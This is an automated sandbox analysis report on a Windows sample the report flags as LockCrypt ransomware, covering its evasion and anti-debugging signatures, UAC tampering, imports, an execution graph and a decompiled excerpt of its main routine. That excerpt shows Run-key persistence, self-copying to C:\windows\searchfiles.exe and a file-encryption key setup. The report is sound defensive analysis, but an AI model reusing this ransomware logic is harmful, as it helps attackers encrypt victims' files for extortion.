Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00EA313E push ecx; ret 9_1_00EA3151
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00EA3265 push ecx; ret 9_1_00EA3278

Malware Analysis System Evasion:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_00401D2D
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeWindow / User API: threadDelayed 4593Jump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeAPI coverage: 5.0 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312Thread sleep count: 4593 > 30Jump to behavior
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312Thread sleep time: -137790000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312Thread sleep time: -30000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_2_004014CC
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_1_004014CC
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_2_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E95DAE FindFirstFileW,9_2_00E95DAE
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_1_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00E95DAE FindFirstFileW,9_1_00E95DAE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E9A7CF IsDebuggerPresent,OutputDebugStringW,9_2_00E9A7CF
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_00401D2D
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00EA32C6 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,9_2_00EA32C6
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00EA32C6 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,9_1_00EA32C6

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmpBinary or memory string: Program Manager
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmpBinary or memory string: Progman
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: GetLocaleInfoW,9_2_00E97325
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: GetLocaleInfoW,9_1_00E97325
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_004017A2
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E969DE memset,GetUserNameW,9_2_00E969DE
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00EA1383 GetVersionExW,9_2_00EA1383
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Contains functionality to modify Windows User Account Control (UAC) settingsShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdmin0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdmin0_1_0040191C

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E9ECC0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,CreateBindCtx,9_2_00E9ECC0
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00E9ECC0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,CreateBindCtx,9_1_00E9ECC0

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 136638 Sample: module.8144.18ffc90c0.400000.dll Startdate: 29/05/2019 Architecture: WINDOWS Score: 80 10 Antivirus or Machine Learning detection for sample 2->10 12 Deletes shadow drive data (may be related to ransomware) 2->12 14 Antivirus or Machine Learning detection for unpacked file 2->14 5 module.8144.18ffc90c0.400000.exe 2->5         started        8 FileCoAuth.exe 4 2->8         started        process3 signatures4 16 Detected LockCrypt Ransomware 5->16 18 Contains functionality to encrypt and move a file in one function 5->18 20 Contains functionality to modify Windows User Account Control (UAC) settings 5->20 22 2 other signatures 5->22

Simulations

Behavior and APIs

TimeTypeDescription
16:50:40API Interceptor4607x Sleep call for process: module.8144.18ffc90c0.400000.exe modified

Antivirus and Machine Learning Detection

Initial Sample

SourceDetectionScannerLabelLink
module.8144.18ffc90c0.400000.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.module.8144.18ffc90c0.400000.exe.400000.0.unpack100%Joe Sandbox MLDownload File
0.1.module.8144.18ffc90c0.400000.exe.400000.0.unpack100%Joe Sandbox MLDownload File
0.2.module.8144.18ffc90c0.400000.exe.400000.0.unpack100%Joe Sandbox MLDownload File

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w10x64
  • FileCoAuth.exe (PID: 2916 cmdline: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding MD5: 7BBCC04B54BA6CF2B28304F6F75D9512)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2019-5-29.2357.2916.1.aodl
Process:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe
File Type:data
Size (bytes):96
Entropy (8bit):3.4085043860359887
Encrypted:false
MD5:C37C99E2664E88627C732AE5CC371962
SHA1:CAE521AE688E99908DAE2873C4BFC403A3C63C16
SHA-256:473EA8B6E02226DD098163F890BCE408E3736BD0AEE5DA27F9797DC21CD0EFCF
SHA-512:BD480EBBE4231FC3D7FFFDC3E051D48E4A0E5CF2E5A88640CA6F0C89BDDF8A3569EB9C50911BEA69EBF172A91EC5FE0208A62B934522A27B373E9A115B75F8E2
Malicious:false
Reputation:low
Preview:EBFGONED....................17.3.6816.0313;ship.onedrive.client-iB..............................

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):5.807309466271178
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.82%
  • Java Script embedded in Visual Basic Script (8000/0) 0.08%
  • Java Script (6500/0) 0.06%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:module.8144.18ffc90c0.400000.exe
File size:11776
MD5:2d1ca86789091f84f0d4f6af9fd5d51d
SHA1:060f86ddb170c4cc721b265a11dbae12533811f4
SHA256:b8dcb1757bfc5d1f57a0927e269a06b5d284340921cc47dd4d7753bb98e04f9f
SHA512:7f55f9205cb472ea07b6bba4971db51acdccb5cf472602a0738bef44b3b21b433dd7c14cc176ea20bd0d4710e810c989f9a1eaf8a616c0875afcde4c40f3b339
SSDEEP:192:GrfOVf1TFoTxFEx29bV29LTwmH+8Ihuz6uTCxWN1tvjywPqcwXYjwdqOKd+7o:GrfOnTFo0x2dm8s++CxW/5SIjwoO1o
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]...................S...........Rich............PE..L......\..................... ............... ....@........................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x401000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x5C91ECFE [Wed Mar 20 07:34:22 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:0a98a06f576cfeebd2f91325d9ccac02

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF4h
mov dword ptr [ebp-04h], 000010F0h
push F0000000h
push 00000018h
push 00000000h
push 00000000h
lea eax, dword ptr [ebp-08h]
push eax
call 5CF932BCh
lea eax, dword ptr [ebp-0Ch]
push eax
mov dword ptr [eax+10h], 004017A2h
xor edi, edi
push edi
push edi
push 0000002Ch
call 5CF923A1h
or byte ptr [edx], al
add byte ptr [eax], al
adc byte ptr [esi+00h], ah
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi+2Fh], dl
jle 5CF923D1h
and eax, 950B6CCCh
push 35682128h
push esp
push esp
xor al, ECh
enter AAF5h, 2Bh
xor ch, 00000069h
xchg eax, ecx
out dx, al
sub eax, E1813362h
push dword ptr [ebp-08h]
call 5CF93296h
lea eax, dword ptr [ebp-04h]
push eax
push 00403000h
push 00000000h
push 00000000h
push 00000000h
push dword ptr [ebp-0Ch]
call 5CF93261h
push dword ptr [ebp-0Ch]
call 5CF9325Fh
push 00000000h
push dword ptr [ebp-08h]
call 5CF93273h
leave
ret
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push 00008000h
call 5CF92A50h
mov dword ptr [ebp-08h], eax
push dword ptr [ebp+08h]
push dword ptr [ebp-08h]
call 5CF93205h
push dword ptr [ebp-08h]
call 5CF93209h
mov ebx, dword ptr [ebp-08h]
mov byte ptr [ebx+eax*2-06h], 00000000h
push 0040379Eh

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x21200x64.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x114.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xfd40x1000False0.5673828125ump; data5.53282933147IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x20000x72c0x800False0.5458984375ump; data5.17939846828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x30000x17300x1200False0.577039930556ump; data5.80284978838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLLImport
kernel32.dllGetModuleFileNameA, GetSystemTimeAsFileTime, GlobalAlloc, GlobalFree, GlobalMemoryStatus, MapViewOfFile, MoveFileW, MultiByteToWideChar, OpenProcess, Process32FirstW, Process32NextW, RtlZeroMemory, SetErrorMode, GetLogicalDrives, SetFilePointerEx, Sleep, TerminateProcess, UnmapViewOfFile, WriteFile, lstrcatA, lstrcatW, lstrcmpW, lstrcmpiA, lstrcmpiW, lstrcpyW, lstrlenA, lstrlenW, GetLastError, GetFileAttributesW, GetEnvironmentVariableA, GetDateFormatA, GetCurrentProcessId, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, CreateToolhelp32Snapshot, CreateThread, CreateFileW, CreateFileMappingA, CreateFileA, CopyFileA, SetFileAttributesW, CloseHandle
shell32.dllSHChangeNotify, ShellExecuteA
advapi32.dllRegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, CryptReleaseContext, CryptImportKey, CryptGenKey, CryptExportKey, CryptEncrypt, CryptDestroyKey, CryptDecrypt, CryptAcquireContextA, AdjustTokenPrivileges, RegQueryValueExA, RegSetValueExA, RegCreateKeyA
mpr.dllWNetOpenEnumA, WNetEnumResourceA, WNetCloseEnum

Static AutoIT Info

General

Code:

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: module.8144.18ffc90c0.400000.exe PID: 2592 Parent PID: 2376

General

Start time:16:50:39
Start date:29/05/2019
Path:C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe'
Imagebase:0x400000
File size:11776 bytes
MD5 hash:2D1CA86789091F84F0D4F6AF9FD5D51D
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: FileCoAuth.exe PID: 2916 Parent PID: 692

General

Start time:16:57:56
Start date:29/05/2019
Path:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding
Imagebase:0xe90000
File size:214656 bytes
MD5 hash:7BBCC04B54BA6CF2B28304F6F75D9512
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: module.8144.18ffc90c0.400000.exe PID: 2592 Parent PID: 2376 module.8144.18ffc90c0.400000.exeCOMMON

    Execution Graph

    Execution Coverage:37.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:77.6%
    Total number of Nodes:134
    Total number of Limit Nodes:5

    Graph

    execution_graph 179 401000 CryptAcquireContextA 187 401063 CryptImportKey CryptDecrypt CryptDestroyKey CryptReleaseContext 179->187 181 401037 182 4010a6 lstrcpyW lstrlenW lstrcatW GetFileAttributesW 181->182 183 401047 181->183 184 4010e0 CreateFileW WriteFile CloseHandle SetFileAttributesW 182->184 185 4010de 182->185 183->182 186 401125 GlobalFree 184->186 185->186 187->181 188 4017a2 217 401781 188->217 191 4017da 7 API calls 192 40184d RegOpenKeyExA RegQueryValueExA 191->192 193 4018c8 CryptAcquireContextA 192->193 194 40188c 192->194 196 4018ba 193->196 194->193 195 401895 RegQueryValueExA 194->195 195->193 195->196 196->193 197 4018e0 GetLastError 196->197 198 401938 7 API calls 196->198 199 4018c3 196->199 203 401925 CryptAcquireContextA 196->203 197->196 200 4018ec GetEnvironmentVariableA ShellExecuteA Sleep 197->200 201 4019d6 CryptEncrypt 198->201 202 401a79 9 API calls 199->202 200->193 201->201 204 401a06 CryptEncrypt CryptDestroyKey CryptReleaseContext RegSetValueExA RegSetValueExA 201->204 205 401b3f 202->205 203->196 204->202 205->205 206 401b5b 17 API calls 205->206 221 401de7 OpenProcessToken 206->221 209 401de7 4 API calls 210 401c88 209->210 228 4016ff CreateThread CloseHandle GetLogicalDrives 210->228 212 401c8d Sleep 213 401ca4 Sleep 212->213 214 401d26 212->214 215 401cb4 ShellExecuteA 213->215 216 401cce CreateFileA WriteFile CloseHandle ShellExecuteA 213->216 214->212 215->216 216->210 218 401784 GlobalAlloc 217->218 219 401792 Sleep 218->219 220 40179e GetModuleFileNameA lstrcmpiA 218->220 219->218 220->191 220->192 222 401c7c 221->222 223 401dfe LookupPrivilegeValueA 221->223 222->209 224 401e10 AdjustTokenPrivileges 223->224 225 401e41 CloseHandle 223->225 224->225 225->222 229 401729 228->229 257 401131 WNetOpenEnumA 228->257 230 401781 2 API calls 229->230 231 40177f 229->231 232 401740 lstrcatW CreateThread CloseHandle 230->232 231->212 232->229 233 4014cc FindFirstFileW 232->233 234 4014eb 233->234 235 4016ed GlobalFree 233->235 236 4014fe lstrcmpW 234->236 241 4015cc 234->241 238 401517 lstrcmpW 236->238 239 4016bb FindNextFileW 236->239 238->239 242 40152a lstrcmpiW 238->242 239->234 240 4016e5 FindClose 239->240 240->235 241->239 243 4015eb lstrcmpiW 241->243 273 401096 241->273 242->239 244 40153d 242->244 243->239 245 401604 lstrlenW 243->245 246 401781 2 API calls 244->246 247 401629 lstrcatW lstrlenW lstrcatW lstrcatW lstrcatW 245->247 248 40160f lstrcmpiW 245->248 249 401547 lstrcatW lstrlenW lstrcatW lstrcatW 246->249 250 401694 SetFileAttributesW 247->250 251 4016a8 247->251 248->239 248->247 252 401572 249->252 250->251 279 40128d MoveFileW 251->279 253 4015a3 CreateThread CloseHandle 252->253 254 40157b GlobalMemoryStatus 252->254 253->239 254->253 256 40159a Sleep 254->256 256->252 258 401281 WNetCloseEnum 257->258 259 401151 257->259 260 401781 2 API calls 259->260 261 401160 260->261 262 401781 2 API calls 261->262 263 40116b WNetEnumResourceA 262->263 264 4011bc 263->264 265 40118f GlobalFree 263->265 267 401271 GlobalFree GlobalFree 264->267 269 401131 2 API calls 264->269 270 4011ee lstrlenA 264->270 266 401781 2 API calls 265->266 268 40119f WNetEnumResourceA 266->268 267->258 268->264 269->264 271 401781 2 API calls 270->271 272 401215 MultiByteToWideChar MultiByteToWideChar CreateThread CloseHandle 271->272 272->264 274 4010a6 lstrcpyW lstrlenW lstrcatW GetFileAttributesW 273->274 275 401781 2 API calls 273->275 276 4010e0 CreateFileW WriteFile CloseHandle SetFileAttributesW 274->276 277 4010de 274->277 275->274 278 401125 GlobalFree 276->278 277->278 278->241 280 4012b3 CreateFileW 279->280 281 4012ad 279->281 282 4012f4 CreateFileMappingA 280->282 283 4012ce MoveFileW 280->283 281->239 285 401313 CloseHandle 282->285 286 40130e CryptAcquireContextA 282->286 283->281 284 4012e3 Sleep 283->284 284->283 285->283 288 401340 CryptGenKey 286->288 289 401336 CloseHandle 286->289 290 401364 CryptExportKey 288->290 291 401358 CryptReleaseContext 288->291 289->285 292 401389 CryptDestroyKey 290->292 294 401393 MapViewOfFile 290->294 291->289 292->291 295 4013f1 CryptEncrypt 294->295 296 4013f6 294->296 295->296 298 401433 10 API calls 295->298 296->292 298->281 299 40191c 300 401938 7 API calls 299->300 301 4019d6 CryptEncrypt 300->301 301->301 302 401a06 CryptEncrypt CryptDestroyKey CryptReleaseContext RegSetValueExA RegSetValueExA 301->302 303 401a79 9 API calls 302->303 304 401b3f 17 API calls 303->304 306 401de7 4 API calls 304->306 307 401c7c 306->307 308 401de7 4 API calls 307->308 309 401c88 308->309 310 4016ff 77 API calls 309->310 311 401c8d Sleep 310->311 312 401ca4 Sleep 311->312 313 401d26 311->313 314 401cb4 ShellExecuteA 312->314 315 401cce CreateFileA WriteFile CloseHandle ShellExecuteA 312->315 313->311 314->315 315->309 316 401d2d 317 401de7 4 API calls 316->317 318 401d42 CreateToolhelp32Snapshot Process32FirstW 317->318 323 401d66 318->323 319 401dd2 CloseHandle Sleep 319->318 320 401d71 lstrcmpiW 321 401d82 lstrlenW 320->321 322 401dc3 Process32NextW 320->322 321->323 324 401d95 GetCurrentProcessId 321->324 322->323 323->319 323->320 324->322 325 401da2 OpenProcess 324->325 325->322 326 401db5 TerminateProcess CloseHandle 325->326 326->322

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_00401000 3 Function_00401063 0->3 1 Function_00401781 2 Function_004017A2 2->1 4 Function_00401DE7 2->4 12 Function_004016FF 2->12 5 Function_00401D2B 6 Function_004014CC 6->1 7 Function_0040128D 6->7 10 Function_00401096 6->10 8 Function_00401D2D 8->4 9 Function_00401131 9->1 9->9 10->1 11 Function_0040191C 11->4 11->12 12->1 12->6 12->9

    Executed Functions

    Function 004017A2, Relevance: 157.9, APIs: 64, Strings: 26, Instructions: 415registryencryptionstringCOMMON
    Download Yara Rule
    C-Code - Quality: 65%
    			E004017A2() {
				struct _SYSTEMTIME _v20;
				struct _FILETIME _v28;
				long* _v32;
				void* _v36;
				char* _v40;
				long* _v44;
				int _v48;
				int _v52;
				long _v56;
				void* _v60;
				CHAR* _t88;
				int _t90;
				int _t98;
				long _t158;
				void* _t186;
				long _t191;
				void* _t192;
				char* _t195;
				CHAR* _t196;
				void* _t197;
				void* _t201;

				_v60 = 0;
				_t88 = E00401781(0x8000); // executed
				_v40 = _t88;
				GetModuleFileNameA(0, _t88, 0x8000); // executed
				_t90 = lstrcmpiA("C:\\windows\\searchfiles.exe", _v40); // executed
				if(_t90 != 0) {
					RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf013f,  &_v36); // executed
					RegSetValueExA(_v36, "unlock", 0, 1, "\"c:\\Decoding help.hta\"", lstrlenA("\"c:\\Decoding help.hta\""));
					RegSetValueExA(_v36, "searchfiles", 0, 1, "C:\\windows\\searchfiles.exe", lstrlenA("C:\\windows\\searchfiles.exe"));
					RegCloseKey(_v36);
					CopyFileA(_v40, "C:\\windows\\searchfiles.exe", 0); // executed
				}
				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DateTime\\", 0, 0xf013f,  &_v36); // executed
				_v52 = 0x114;
				if(RegQueryValueExA(_v36, "orsa", 0, 0, 0x4045e0,  &_v52) != 0 || _v52 != 0x114) {
					goto L7;
				} else {
					_v52 = 0x500;
					if(RegQueryValueExA(_v36, ?str?, 0, 0, 0x4040e0,  &_v52) != 0 || _v52 != 0x500) {
						while(1) {
							L7:
							_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
							while(_t98 == 0) {
								_t158 = GetLastError();
								if(_t158 != 0x80090019) {
									if(_t158 != 0x8009000f) {
										break;
									}
									_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 8);
									continue;
								}
								GetEnvironmentVariableA("ComSpec", _v40, 0x5dc);
								ShellExecuteA(0, 0, _v40, "/c Regsvr32 /s Rsaenh.dll", 0, 0);
								Sleep(0x64);
								goto L7;
							}
							_push( &_v32);
							_push(0x8000001);
							_push(1);
							_push(_v44);
							L00401F86(); // executed
							_v48 = 0x494;
							_push( &_v48);
							_push(_v40);
							_push(0);
							_push(7);
							_push(0);
							_push(_v32);
							L00401F80(); // executed
							_v48 = 0x114;
							_push( &_v48);
							_push(0x4045e0);
							_push(0);
							_push(6);
							_push(0);
							_push(_v32);
							L00401F80();
							CryptDestroyKey(_v32);
							CryptReleaseContext(_v44, 0);
							CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
							CryptImportKey(_v44, 0x403fbf, 0x114, 0, 0, "@�l");
							_v56 = 4;
							_t197 = _v40;
